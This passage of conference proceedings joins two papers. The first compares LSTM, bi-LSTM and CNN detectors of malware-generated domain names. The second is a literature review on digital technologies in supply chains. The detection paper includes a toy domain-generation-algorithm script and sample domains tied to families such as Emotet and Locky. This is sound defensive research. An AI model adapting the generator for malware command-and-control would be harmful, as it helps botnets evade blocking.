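As an illustration of seeding and time dependence only, the hypothetical generator below derives a short list of domains deterministically from a date and a numeric seed; it mimics the general structure of the families listed in Table 1 without reproducing any specific one.

```python
import hashlib
from datetime import date

def toy_dga(day: date, seed: int, count: int = 5, length: int = 12, tld: str = ".net"):
    """Deterministically derive `count` domain names from a date and a numeric seed."""
    domains = []
    for i in range(count):
        material = f"{day.isoformat()}-{seed}-{i}".encode()
        digest = hashlib.sha256(material).digest()
        # map the first `length` bytes of the hash onto lowercase letters
        name = "".join(chr(ord("a") + b % 26) for b in digest[:length])
        domains.append(name + tld)
    return domains

# Both the malware and the botmaster compute the same list for a given day,
# so only the seed has to be shared in advance.
print(toy_dga(date(2022, 5, 1), seed=0xBEEF))
```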

Fig. 1. Camouflage technique using DGAs

Table 1 presents an overview of different types of domain generation algorithms (DGAs), as well as some examples of algorithmically generated domains corresponding to each class.

2.2 DGA Features

Feature extraction is a difficult process that has a significant influence on the accuracy and reliability of traditional machine learning detection methods. However, this process is automated in neural network algorithms, and it does not


Table 1. Overview of mixed classes of DGA data with some examples.

DGA family                Domain                                  Type
Cryptolocker              wrdpvitewnpfv.co.uk                     DGA
P2P                       jmnlnjflrlnjfxkrhazlrnjpz.net           DGA
Post                      1xhkzo0vu7c96fwf07o1o9wjau.org          DGA
Volatile                  aslhplayergetadobef.co.uk               DGA
bamital                   ca587e6fc0aa82b6556c176e54d40c61.org    DGA
banjori                   vrxhererwyatanb.com                     DGA
beebone                   ns1.dnsfor18.net                        DGA
chinad                    3bvcn4hqs8gm9eeg.info                   DGA
conficker                 yvucyomg.org                            DGA
corebot                   qjmh1lu2kt307nu87jk.ddns.net            DGA
cryptolocker              lmnlbvkcomdoh.biz                       DGA
cryptowall                usaalwayswar.com                        DGA
dircrypt                  cjpnivrcgsjl.com                        DGA
dyre                      d37b7a931cee839031c73019c78cec7bd2.in   DGA
emotet                    snpwmbhvvsnjoijr.eu                     DGA
fobber                    tjjxxfvaao.com                          DGA
geodo                     artgyebqtmjkfjov.eu                     DGA
gspy                      cbc558a69bf5ac12.net                    DGA
hesperbot                 nleflqnx.com                            DGA
kraken                    gjtwmoph.dyndns.org                     DGA
locky                     uhprnpxjc.ru                            DGA
matsnu                    hourtable-reference.com                 DGA
necurs                    ednyilmgbrbcbocqqg.net                  DGA
none                      mte.gov.br                              Normal
nymaim                    lwgpakhwu.info                          DGA
padcrypt                  ladanfdffnomeoea.net                    DGA
proslikefan               mopizpeyb.in                            DGA
pushdo                    lumucjatesl.kz                          DGA
pykspa                    tkringn.org                             DGA
qadars                    7c1mrc5ers9a.org                        DGA
qakbot                    bserwvfpfqnzkn.biz                      DGA
ramdo                     ciyouwqqugcmqkiy.org                    DGA
ramnit                    ugckucagmxgyby.bid                      DGA
ranbyus                   gtgqvexfgtonbx.pw                       DGA
rovnix                    f8qlliz2qyitk5hmpl.biz                  DGA
shiotob/urlzone/bebloh    rkz2jgyqtbd.net                         DGA
simda                     nopewom.info                            DGA
suppobox                  theseguess.net                          DGA
symmi                     eqidacwakui.ddns.net                    DGA
tinba                     wxyuggjrvvbr.com                        DGA
tofsee                    dueduei.biz                             DGA
vawtrak                   jsdyrgne.top                            DGA
virut                     wxyurh.com                              DGA


require any handcrafted features or contextual information, relying only on the domain names themselves. Two major kinds of features appear in the literature: features that depend on the actual execution of malware samples in a controlled environment, with a certain configuration and within a specified time frame, and features that can be computed from the domain name string alone.
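For contrast, the kind of handcrafted, domain-name-only features that a traditional machine learning pipeline would rely on can be computed as in the sketch below; the chosen features (length, character entropy, digit and vowel ratios) are common examples from the literature, not the exact set used in any of the cited works.

```python
import math
from collections import Counter

def lexical_features(domain: str) -> dict:
    """A few handcrafted, domain-name-only features computed from the name itself."""
    name = domain.split(".")[0].lower()
    counts = Counter(name)
    entropy = -sum((c / len(name)) * math.log2(c / len(name)) for c in counts.values())
    return {
        "length": len(name),
        "entropy": entropy,                                          # character randomness
        "digit_ratio": sum(ch.isdigit() for ch in name) / len(name),
        "vowel_ratio": sum(ch in "aeiou" for ch in name) / len(name),
    }

print(lexical_features("wrdpvitewnpfv.co.uk"))  # DGA-like name
print(lexical_features("mte.gov.br"))           # benign name
```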

3 Neural Network Methods to Detect DGAs

3.1 Data Collection

Researchers need a representative set of clean domain names and algorithmically generated domain names to train, validate, and test any approach. Sadly, the absence of best practices and of interest in exchanging data between the academic and business communities in the field of information security makes it difficult for academic researchers to access data sets. Researchers therefore need to build their own experimental data sets using the data they already gather, which might not be a simple task. In general, there are two main sources of data collection: the first is the collection of active domain name system (DNS) data and the second is the collection of passive DNS (pDNS) data.

3.2 Architectures of the Compared Models

The neural network, also known as the Artificial Neural Network (ANN), is a machine learning model inspired by the human brain, based on several basic computing components called neurons or nodes, each of which computes a simple function. The neurons are closely interlinked in a layered model. Usually, neurons are arranged so that the first layer is the input layer, the last one is the output layer, and the layers between them are the hidden layers. The typical ANN training technique is called backpropagation. This approach attempts to decrease the loss function, which is the difference between the measured output and the known label, by changing the weights of the model. Each labeled sample is fed into the network, just as in the testing process, except that, when the output layer is reached, the algorithm measures the deviation from the known and desired output and adjusts the weights of the model so that the error is minimized. Deep learning first addressed DGA detection with the work of [1] in 2016, an implementation of Long Short-Term Memory networks (LSTM) used for non-specific DGA analysis; this method learns features automatically, thus offering the potential to bypass the human effort of feature engineering. Long Short-Term Memory Networks: Long short-term memory networks (LSTMs), a type of recurrent neural network (RNN), have recently received a lot of interest due to their success in solving difficulties involving sequence processing [13]. Because domain names are made up of a series of characters, LSTMs are a natural choice for classifiers. We stick extremely close to the original model because the LSTM network proposed by [1] was created exclusively for


Fig. 2. The architecture of the LSTM model

the identification of DGAs. The network consists of a single-node output layer with sigmoid activation, an embedding layer, and an LSTM layer (128 LSTM cells with default tanh activation). The embedding layer's job is to learn a 128-dimensional numerical vector representation for each character that might appear in a domain name. This vector is not the same as a 128-dimensional ASCII encoding: the embedding converts semantically related characters into comparable vectors, with the idea of similarity deduced (learned) from the classification job at hand. All deep neural network designs under investigation begin with such an embedding layer, as will be seen in the rest of this section. We set the parameter choices for the embedding layer, such as the dimensionality of the embedding space, to be the same for all models to allow for a fair comparison. The architecture of this model is shown in Fig. 2, where the layers are:
– Input layer
– Embedding layer
– LSTM layer
– An optional dense layer
– Output layer
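A minimal Keras sketch of this architecture is given below; the maximum domain length and vocabulary size are our own assumptions, and the remaining hyper-parameters follow the description above rather than the exact configuration of [1].

```python
from tensorflow.keras import layers, models

MAX_LEN = 75       # maximum domain-name length (assumed)
VOCAB_SIZE = 128   # number of distinct input characters (assumed)

def build_lstm_model():
    # Embedding layer -> LSTM layer -> single sigmoid output (benign vs. DGA)
    model = models.Sequential([
        layers.Input(shape=(MAX_LEN,)),
        layers.Embedding(input_dim=VOCAB_SIZE, output_dim=128),
        layers.LSTM(128),                       # 128 LSTM cells, default tanh activation
        layers.Dense(1, activation="sigmoid"),  # binary classification output
    ])
    model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
    return model
```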

Bidirectional LSTM Models: To tackle the comparative task, we also built a binary classifier that labels a domain as benign or malicious based on a biLSTM architecture; the classifier takes the domain name as input and classifies it. The architecture is shown in Fig. 3, where the layers are:
– Input layer
– Embedding layer
– LSTM layer or bidirectional LSTM
– An optional dense layer
– Output layer
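Under the same assumptions, the only structural change with respect to the previous sketch is wrapping the recurrent layer in Keras' Bidirectional wrapper:

```python
from tensorflow.keras import layers, models

MAX_LEN, VOCAB_SIZE = 75, 128  # assumed, as in the LSTM sketch

def build_bilstm_model():
    model = models.Sequential([
        layers.Input(shape=(MAX_LEN,)),
        layers.Embedding(input_dim=VOCAB_SIZE, output_dim=128),
        layers.Bidirectional(layers.LSTM(128)),  # reads the character sequence in both directions
        layers.Dense(1, activation="sigmoid"),
    ])
    model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
    return model
```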


Fig. 3. The architecture of the biLSTM model

CNN Model: A CNN is a deep learning model that uses local features and achieves exceptional performance in the field of image recognition. A CNN is made up of two parts: a feature extraction network and a classification network. First, the feature extraction stage executes convolutional and pooling layers repeatedly, extracting data characteristics automatically. The convolutional layer, which is at the heart of a CNN, applies many filters (or kernels) to the input data in order to find useful features. It generates feature maps by sliding the filters over the input and executing a convolution operation between them and the input data. CNNs are typically used to extract features from images, but it is also feasible to use a CNN to encode a sequence of characters. To convert input to output, only a few distinct kinds of layers are required; in particular, the main layers are convolutional, pooling, and fully connected layers. Each of these layers has its own set of parameters that can be optimized. The architecture of the CNN model is shown in Fig. 4, where the layers are:
– Embedding layer
– CNN layer
– An optional dense layer
– Output layer
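A corresponding convolutional sketch is shown below; the filter count, kernel size and dense-layer width are illustrative choices of ours, not values taken from the paper.

```python
from tensorflow.keras import layers, models

MAX_LEN, VOCAB_SIZE = 75, 128  # assumed, as in the previous sketches

def build_cnn_model():
    model = models.Sequential([
        layers.Input(shape=(MAX_LEN,)),
        layers.Embedding(input_dim=VOCAB_SIZE, output_dim=128),
        layers.Conv1D(filters=128, kernel_size=4, activation="relu"),  # character n-gram filters
        layers.GlobalMaxPooling1D(),                                   # pool over the whole sequence
        layers.Dense(64, activation="relu"),                           # optional dense layer
        layers.Dense(1, activation="sigmoid"),
    ])
    model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
    return model
```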

4 Evaluation

4.1 Implementation Details

Several Python and Spark libraries were used in the comparative study, including pandas [14], numpy, keras [15], scikit-learn [16], enchant, PySpark [17] and MLlib [18]. Because pandas DataFrames expose very useful properties and interoperate more easily with the Python libraries, we switched from the Spark data type to pandas and back whenever desired in this implementation.
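Moving between the two representations is a one-liner in each direction; the sketch below assumes an existing SparkSession and a small, hypothetical labelled sample.

```python
from pyspark.sql import SparkSession
import pandas as pd

spark = SparkSession.builder.appName("dga-detection").getOrCreate()

# Hypothetical labelled data: domain string and binary label (1 = DGA, 0 = benign)
pdf = pd.DataFrame({"domain": ["mte.gov.br", "wrdpvitewnpfv.co.uk"], "label": [0, 1]})

sdf = spark.createDataFrame(pdf)   # pandas -> Spark, e.g. for distributed preprocessing
pdf_back = sdf.toPandas()          # Spark -> pandas, e.g. before feeding Keras
```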


Fig. 4. The architecture of the CNN model

Fig. 5. Data splitting

4.2 Results

We trained, validated and tested the models on a data set of 1 million domain names from the mixed classes represented in Table 1, split as represented in Fig. 5 with a ratio of 60:20:20. That is, 60% of the data is sent to the training set, 20% to the validation set and the rest to the test set. Bi-LSTM achieved an accuracy of 97.9%, LSTM an accuracy of 97.7% and CNN an accuracy of 79.6%. Figures 6, 7 and 8 represent the training of the models as a function of the number of epochs, using EarlyStopping, which stops training when a monitored metric has stopped improving; we note that all models stop improving at 35 epochs at most.
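A sketch of the 60:20:20 split and of the EarlyStopping-driven training is given below; the batch size, patience and epoch budget are our own choices, the data are synthetic placeholders, and build_bilstm_model refers to the Bi-LSTM sketch given earlier.

```python
import numpy as np
from sklearn.model_selection import train_test_split
from tensorflow.keras.callbacks import EarlyStopping

# Placeholder inputs: integer-encoded, padded domain names and binary labels.
X = np.random.randint(0, 128, size=(1000, 75))
y = np.random.randint(0, 2, size=(1000,))

# 60:20:20 split into training, validation and test sets.
X_train, X_tmp, y_train, y_tmp = train_test_split(X, y, test_size=0.4, random_state=42)
X_val, X_test, y_val, y_test = train_test_split(X_tmp, y_tmp, test_size=0.5, random_state=42)

model = build_bilstm_model()  # builder from the Bi-LSTM sketch above (assumed in scope)
model.fit(X_train, y_train,
          validation_data=(X_val, y_val),
          epochs=50, batch_size=128,
          callbacks=[EarlyStopping(monitor="val_accuracy", patience=5,
                                   restore_best_weights=True)])
print("test accuracy:", model.evaluate(X_test, y_test)[1])
```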


Fig. 6. bi-LSTM model accuracy

Fig. 7. LSTM model accuracy

In the test phase, the models achieve the accuracies shown in Fig. 9: the Bi-LSTM model produces more accurate classification results than the individual CNN or LSTM models.


Fig. 8. CNN model accuracy

Fig. 9. Comparison of accuracy between models

5 Conclusion and Future Work

DGA detection, i.e. the classification task of distinguishing between benign domain names and those generated by malware (Domain Generation Algorithms) has become a central topic in information security. In this paper, we have compared three different deep neural network architectures that perform this classification. The proposed comparison demonstrates the efficiency of Bi-LSTM and LSTM in the detection of malicious domain names generated using DGAs, unlike CNN, which shows poor efficiency.


References 1. Woodbridge, J., Anderson, H.S., Ahuja, A., Grant, D.: Predicting domain generation algorithms with long short-term memory networks (2016). https://arxiv.org/ abs/1611.00791 2. Saxe, J., Berlin, K.: eXpose: a character-level convolutional neural network with embeddings for detecting malicious URLs, file paths and registry keys (2017). https://doi.org/10.48550/arXiv.1702.08568 3. Yu, B., Gray, D.L., Pan, J., De Cock, M., Nascimento, A.C.: Inline DGA detection with deep networks. In: 2017 IEEE International Conference on Data Mining Workshops (ICDMW), pp. 683–692. IEEE, November 2017 4. Thakur, K., Alqahtani, H., Kumar, G.: An intelligent algorithmically generated domain detection system. Comput. Electr. Eng. 92, 107129 (2021) 5. Highnam, K., Puzio, D., Luo, S., Jennings, N.R.: Real-time detection of dictionary DGA network traffic using deep learning. SN Comput. Sci. 2(2), 1–17 (2021) 6. Dhingra, B., Zhou, Z., Fitzpatrick, D., Muehl, M., Cohen, W.W.: Tweet2vec: character-based distributed representations for social media. In: Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics, vol. 2, pp. 269–274 (2016) 7. Vosoughi, S., Vijayaraghavan, P., Roy, D.: Tweet2vec: learning tweet embeddings using character-level CNN-LSTM encoder-decoder. In Proceedings of the 39th International ACM SIGIR Conference on Research and Development in Information Retrieval, pp. 1041–1044, July 2016 8. Lavanya, P.M., Sasikala, E.: Deep learning techniques on text classification using Natural language processing (NLP) in social healthcare network: a comprehensive survey. In: 2021 3rd International Conference on Signal Processing and Communication (ICPSC), pp. 603–609. IEEE, May 2021 9. Zhang, X., Zhao, J., LeCun, Y.: Character-level convolutional networks for text classification. In: Advances in Neural Information Processing Systems, vol. 28, pp. 649–657 (2015) 10. Kowsari, K., Jafari Meimandi, K., Heidarysafa, M., Mendu, S., Barnes, L., Brown, D.: Text classification algorithms: a survey. Information 10(4), 150 (2019) 11. Akhter, M.P., Jiangbin, Z., Naqvi, I.R., Abdelmajeed, M., Fayyaz, M.: Exploring deep learning approaches for Urdu text classification in product manufacturing. Enterp. Inf. Syst. 16(2), 223–248 (2022) 12. Aviv, A.J., Haeberlen, A.: Challenges in experimenting with botnet detection systems. In: 4th Workshop on Cyber Security Experimentation and Test (CSET 2011), p. 6 (2011) 13. Hochreiter, S., Schmidhuber, J.: Long short-term memory. Neural Comput. 9(8), 1735–1780 (1997) 14. McKinney, P.: A foundational Python library for data analysis and statistics, Python high perform. Sci. Comput. (14), 1–9 (2011) 15. Gulli, A., Pal, S.:Deep Learning with Keras. Packt Publishing Ltd., Birmingham (2017) 16. Varoquaux, G., Buitinck, L., Louppe, G., Grisel, O., Pedregosa, F., Mueller, A.: Scikit-learn: machine learning without learning the machinery. GetMobile: Mob. Comput. Commun. 19(1), 29–33 (2015) 17. Drabas, T., Lee, D.: Learning PySpark. Packt Publishing Ltd., Birmingham (2017) 18. Meng, X., et al.: Mllib: machine learning in apache spark. J. Mach. Learn. Res. 17(1), 1235–1241 (2016)

A Literature Review of Digital Technologies in Supply Chains Rachid El Gadrouri(B) National School of Commerce and Management, Ibn Zohr University, Agadir, Morocco [email protected]

Abstract. Digital technologies are a phenomenon that has attracted growing attention for a few years. This emergence is linked to the implementation and dynamisation of Industry 4.0, to the progress of digital technologies, but also to the specificities of the competitive context, particularly in terms of complexity, uncertainty and high dynamics. Companies must therefore integrate digital technologies into their supply chain management systems, because they create a competitive advantage through the availability of the product offer, the reduction of costs and the increase of market share. They also enable the integration of practices that improve access to information, increase responsiveness and collaboration capabilities, and even agility. This article examines, through a systematic review, what the scientific community says about the main technologies and characteristics of digital technology adoption in supply chains. Keywords: Supply Chain · Digital technology · Technology adoption

1 Introduction The recent technological progress, illustrated by the emergence of a range of digital technological tools, has attracted the attention of firms and academics, because the use of these emerging technologies can present significant opportunities for the supply chain, particularly in improving the connection between information flows, goods flows, financial flows and also flows of people [1], while creating a new mode of supply chain management. This phenomenon is called the Digital Supply Chain (DSC), also known as Supply Chain 4.0, which is presented as the application of digital technologies such as the Internet of Things, advanced robotics and Big Data analysis to supply chain management, while creating automated networks to significantly improve performance and customer satisfaction [2]. Moreover, these technologies have the ability to transform supply chains into more agile and resilient networks, because they improve performance in key supply chain qualities such as partnership, transparency, flexibility, responsiveness and efficiency. The implementation of digital technologies in supply chains is a developing concept resulting from a transformational approach to supply chain management that uses disruptive Industry 4.0 technologies to rationalize supply chain processes, activities, and

252

R. El Gadrouri

relationships to generate significant strategic benefits for all supply chain stakeholders [3]. Some see it as an ecosystem of mass and customized (digital and physical) products and services, through data mining and data trends, even predicting customer need lifecycles, adapting their operations for quick and optimal responses [3]. However, other researchers argue that there are two aspects to this concept: the first relates to the implementation of novel numerical tools in supply chain processes that enable the creation of business relationships with suppliers and customers, while the second relates to the roles of these technologies in transforming supply chain capabilities and operational performance [4]. Similarly, [5] have defined DSC as the development of data structures then the implementation of advanced tools that improve supply chain integration and agility, thereby improving purchaser facility and viable organizational performance. However, before this phenomenon quickly and widely aroused interest in theoretical and empirical research, it was the result of remarkable historical transformations, depending on different global circumstances: historical, human, natural and societal [6]. This author has made clear, in this sense that the advent of digital technologies or the era of digitalization is even outdated, after this post-pandemic period that has been a real test for: sustainability, resilience, agility and integration of supply chains. He argues for a new reflection of a model called Viable supply chain. Moreover, the scientific literature on this subject is not limited to the conceptualization of the notion itself, but the theoretical and empirical research conducted has tried to demonstrate the relationships and intersections between digital technologies and supply chain management. Notably, [7] and [8] have respectively conducted empirical studies on the adoption of Big Data Analytics (BDA) in the supply chain and also on the relationship between the determinants of Blockchain (BC) adoption and supply chain performance; [9] studied the employment of Industry 4.0 technologies in the supply chain; [10] theoretically explored the obstacles to implementation of blockchain (BC) tools on sustainable supply chain; [11] clarified the disruptions of Industry 4.0 technologies on supply chain operations and managing; [4] developed a conceptual framework of the Digital Supply Chain; [12] established a conception of the supply chain activated by Blockchain (BC) technology. Very recently the covid-19 pandemic has expanded the field of scientific research into other aspects of the supply chain, particularly resilience, sustainability, and agility [13], while taking advantage of the circumstances of this everevolving sphere of digitalization; [11] disrupt the management of all phases of the supply chains [14], for example the development of transactions and the conquest of new partners in the relationship: Buyers-Suppliers, while using digital technologies. At the similar period, the adoption of numerical tools will certainly face obstacles impacting the application of supply chain technologies due to various organizational, operational and financial constraints. Therefore, this paper aims to deliver a state of the art on the emerging practice of digital technologies in supply chains. First, it provides an overview of the different digital tools involved in supply chain management, as well as their benefits and characteristics. 
Second, it provides a review of studies focused on the adoption of digital technologies in the supply chain, in order to motivate researchers and practitioners to pay greater attention to this topic.


2 Literature Review and Background

2.1 Digital Technologies of the Supply Chain

The proliferation of digital technologies and their use allows companies to reduce production process costs as well as create new types of jobs [15]. The era of digitalization has enabled the implementation of a range of digital technologies that have impacted supply chain management and led to the development of innovative supply chain features. The scientific literature on the subject [7, 11, 16–24] cites in particular the following digital technologies as developing the supply chain: Artificial Intelligence (AI), Cloud Computing (CC), Cyber Systems Security (CSS), Big Data Analytics (BDA), Blockchain (BC), Internet of Things (IoT), and Robotization (R). Table 1 gathers some definitions of these technologies from the supply chain literature.

Table 1. Digital technologies in the supply chain

Cyber Systems Security (CSS)
- [25]: Network structure with embedded devices (sensors) allowing self-management of physical processes and their feedback
- [26]: Digital technologies that control physical processes not only in one direction but are also linked to feedback loops with the system, allowing real-time harmonization of information and physical flows

Big Data Analytics (BDA)
- [27]: A global approach to obtaining actionable information to create a competitive advantage, which differs from the business analysis approach in terms of the 5 Vs: volume, variety, velocity, veracity and value
- [28]: Allows data to be collected from a variety of sources and fully analyzed, enabling real-time decision making based on the results of the data analysis
- [29]: The procedure of using analysis algorithms to uncover capacities concealed in big data, such as hidden patterns or unknown correlations

Artificial Intelligence (AI)
- [30]: Tools based on intelligence, referring to dedicated theories and techniques
- [31, 32]: Production systems that use machines to fully imitate the tasks performed by human labor
- [33, 34]: Any device or facility that uses computer skills to operate as, or replace, employees

Internet of Things (IoT)
- [35]: An internet-based technical infrastructure that enables the transfer of goods and services in the international supply chain network
- [36]: Integrates several information and communication technologies, for example tools and software for storing, extracting and analyzing information, as well as electronic equipment for connecting users or sets of materials
- [23]: A system of objects intended to ensure the connection between them without having to resort to human means

Blockchain (BC)
- [37]: A large register of transaction data recorded in a multi-member network; transaction data is stored in records arranged in historical order
- [38]: A large digital ledger that is used to share and distribute transactions within a network
- [39]: A digital directory that is encrypted and hosted on multiple servers in a public or private network; once records are assembled in a chain they are immutable and cannot be deleted, being controlled and administered through automated and shared management procedures

Robotization (R)
- [40]: A technology that focuses on the dematerialization of repetitive, routine and standards-based human operations, with the aim of generating gains for companies that choose to deploy it
- [41]: A pre-configured programming interface that uses operating principles and a set of predetermined tasks to automatically execute a sequence of procedures, operations, exchanges and assignments in one or more unrelated software systems, producing a result or service with human exception handling
- [42]: The dematerialization of the execution of operations using structured information flow management mechanisms, leading to a precise decision and a deterministic result

Cloud Computing (CC)
- [43, 44]: A system offering access to a generalized network containing a set of configurable computing resources (networks, servers, storage, applications and services) that can be provisioned and released rapidly with minimal management effort or interaction with service providers
- [45]: A digital technology for storing and processing huge amounts of data, which boosts companies' production systems and brings them higher performance and lower costs
- [46]: Turns information technologies into utility computing, accessible to all organizations for managing and delivering services over the internet

All of these digital technologies play important roles in supply chain management. For example, [47] analyzed the impact of Big Data Analytics (BDA) on improving supply chain performance along different facets: visibility, robustness and resilience. Cloud Computing (CC) contributes to developing the responsiveness and efficiency of supply chain processes [48], while the Internet of Things (IoT) facilitates supply chain coordination, scheduling and monitoring [49]. In addition to the plurality of digital tools used in supply chain management, this wave of digitalization also results in supply chains acquiring new properties and characteristics [50–52]. Table 2 lists the main characteristics of digital technologies in the supply chain reported in the scientific literature.

Table 2. Characteristics of digital technologies in the supply chain

- Intelligence [50, 51]: Enables better autonomous decision making, automated execution and self-learning, and promotes innovation in supply chain operations thanks to the options offered by the use of technological means
- Scalability [50, 51]: Goes beyond responding to changes in the size of the supply chain, making it possible to optimize processes and identify anomalies and errors
- Speed [51, 53]: Makes it possible to achieve the speed desired by organizations that are always looking for ways to deliver rapidly
- Transparency [52]: The scheduling of flows within the supply chain, including the modeling of supply chain networks by mobilizing in real time in response to changes
- Flexibility [51, 52]: The ability to ensure operational agility in the face of market volatility and changing circumstances; digitalization allows the supply chain to respond effectively and efficiently to its environment through the active use of collected and specified data
- Global connectivity [51, 52]: Establishing a way, via digital technologies, to build efficient global hubs that provide goods and services locally rather than transporting them around the world
- Innovation [54]: A key feature ensuring that digital technologies remain adaptable to change; new generations of technologies appear at an unprecedented rate, and digital technologies are expected to find better ways to integrate these advances into processes to maintain competitiveness and supply chain excellence

3 Methodological Procedures
For the conduct of this study we followed the protocol of [55], which includes the following steps: (1) planning the review, (2) conducting the review, and (3) reporting the results of the review, applied to 96 articles identified in relevant journals on the use of digital technologies in supply chains.


Table 3 and Fig. 1 provide a clear picture of our study approach, targeted databases, type of publication, and use of keywords in the search structure.

Table 3. Research protocol

- Research databases: Web of Science (WoS covers a wide range of disciplines and its records go back to 1900 [56]); we therefore chose WoS as our source for extracting article information [55]
- Publication type: Peer-reviewed journal publications
- Language: English
- Date range: No time restriction was applied, in order to include all possible studies; the latest search was done in mid-2021
- Search fields: Titles, abstracts and keywords
- Search terms: Any combination of the strings "Digit*" OR "Digital Technologies" OR "Technology Transfer" OR "Digital Technology Adoption" AND ("Supply Chain" OR "Supply Chain Management"); we used all these keywords to retrieve all possible results
- Criteria for inclusion: Direct connection to the article's research objectives (building on digital technologies, focusing on one or more specific digital technologies enabling the digitalization of the supply chain) and a focus on 'Operations Research and Management Science', 'Business', 'Management' and 'Economics'
- Criteria for exclusion: No direct relationship with the research objectives of the article (articles dealing only with technical aspects were not considered)
- Data analysis and synthesis: All types of analysis

Fig. 1. The literature review protocol (systematic literature review based on the Web of Science database: N = 2999 records retrieved; N = 517 after applying the execution criteria; N = 220 after abstract screening and short-listing; N = 96 retained for full-paper analysis)

4 Results and Discussions
All the selected articles were published from 2014 onwards, the majority of them in 2019 and 2020, which is strong evidence that research on the use of digital technologies in supply chain management is still emerging. Figure 2 illustrates the distribution of the selected papers by year of publication. Before 2018, fewer than seven articles per year were published on this subject, but publication levels then skyrocketed: twenty-four articles appeared in 2019, thirty-nine in 2020 and twelve in 2021 (our search was limited to June 2021).

Fig. 2. Distribution of papers by publication year (between one and seven papers per year from 2014 to 2018, then 24 papers in 2019, 39 in 2020 and 12 in 2021 up to the search cut-off)

The 96 articles selected in this study are distributed across 41 journals, as shown in Table 4. The journal Production Planning & Control dominates this distribution with 15 articles on the topic, followed by Supply Chain Management-An International Journal (6 articles), International Journal of Production Research (6 articles), International Journal of Production Economics (6 articles), International Journal of Physical Distribution & Logistics Management (5 articles) and International Journal of Logistics Management (4 articles). The main authors are Wamba, Ivanov, Dolgui, Queiroz and Seyedghorban.

Table 4. Distribution of papers by journal

- Production Planning & Control: 15
- Supply Chain Management-An International Journal: 6
- International Journal of Production Research: 6
- International Journal of Production Economics: 6
- International Journal of Physical Distribution & Logistics Management: 5
- International Journal of Logistics Management: 4
- Transportation Research Part E-Logistics and Transportation Review: 3
- Industrial Marketing Management: 3
- International Journal of Operations & Production Management: 3
- Business Process Management Journal: 3
- Production and Operations Management: 2
- Logistics-Basel: 2
- International Journal of Business Analytics: 2
- Supply Chain Forum: 2
- Operations and Supply Chain Management-An International Journal: 2
- International Journal of Logistics-Research and Applications: 2
- Business Horizons: 2
- Journal of Modelling in Management: 2
- Logforum: 2
- Benchmarking-An International Journal: 2
- Journal of Manufacturing Technology Management: 2
- Journal of Business Logistics: 2
- Technological and Economic Development of Economy: 1
- Journal of Business Ethics: 1
- International Journal of Lean Six Sigma: 1
- Journal of Industrial Integration and Management-Innovation and Entrepreneurship: 1
- Journal of Business Research: 1
- Brazilian Journal of Operations & Production Management: 1
- Journal of Engineering and Technology Management: 1
- International Journal of Mathematical Engineering and Management Sciences: 1
- Estudios de Economia Aplicada: 1
- Journal of Purchasing and Supply Management: 1
- Applied Stochastic Models in Business and Industry: 1
- Industry and Innovation: 1
- Systems Research and Behavioral Science: 1
- Engineering Construction and Architectural Management: 1
- Technovation: 1
- Management Science: 1
- Journal of Enterprise Information Management: 1
- Oeconomia Copernicana: 1
- Total: 96

Figure 3 analyzes the research methods used in the selected articles. The case study is the most used method (40 papers), followed by conceptual analysis (28 papers), literature review (13 papers) and other methods such as mixed methods (5 papers) and Delphi (1 paper). We also studied the distribution of articles by country, presented in Table 5. The study highlights that the publications come from only 11 countries. More than 62.5% of the articles come from England, followed by the USA (13.5%); the results in Table 5 clearly show that these first two countries contribute more than 76% of the total. This imbalance raises questions about the interest in this subject, or the scarcity of data in this field, in other countries.

Fig. 3. Publications by research methodology (case study: 40; conceptual analysis: 28; literature review: 13; mixed methods: 5; Delphi: 1; the remaining papers use other methods)

Table 5. Countries and number of publications

- England: 60 articles (62.5%)
- USA: 13 articles (13.5%)
- Netherlands: 11 articles (11.45%)
- Poland: 3 articles (3.25%)
- Switzerland: 2 articles (2.08%)
- Indonesia: 2 articles (2.08%)
- Spain: 1 article (1.04%)
- Singapore: 1 article (1.04%)
- Brazil: 1 article (1.04%)
- India: 1 article (1.04%)
- Lithuania: 1 article (1.04%)
- Total: 96 articles (100%)

5 Conclusion
This study, which analyzed 96 articles using the systematic literature review method, makes an important contribution to the supply chain management research community by highlighting the different digital technologies adopted in the supply chain literature, as well as their characteristics and benefits. Our results show a restricted distribution of articles (96 papers across 41 journals), indicating that research on supply chain digitalization is so far concentrated in a limited set of journals and countries (mainly England and the USA). This suggests that researchers from these countries should coordinate with researchers from countries with few publications, especially in Africa, Asia and Latin America, in order to exchange knowledge and grow scientific research in this area on a global scale. Another sign that this field is still in its early stages is the nature of the research, which remains limited to case studies (40 of 96 articles) and conceptual analyses (28 of 96 articles); empirical validation and confirmation studies are therefore needed. This study also has limitations related mainly to our exclusion criteria: we eliminated all articles written in languages other than English, as well as book chapters, books and conference proceedings, which represents a loss of other data that may be very relevant for this analysis. Overall, the supply chain has recently entered a new phase of digitalization that differs from previous phases in terms of scope, responsiveness, transformative capacity and complexity. This article has examined the specifics that are likely to arise in any implementation of supply chain technologies, keeping in mind that the ability to use these digital technologies can continue to refine supply chain management. At the same time, the adoption of digital technologies in the supply chain will surely face obstacles to overcome through the accurate capture of new technologies and their disruptions. In this sense, scientific research analyzing the levers and obstacles of digital technology use is still scarce, both theoretically and empirically. For this reason, we consider it important to carry out further work in this area in order to explain and test the contribution of this phenomenon.

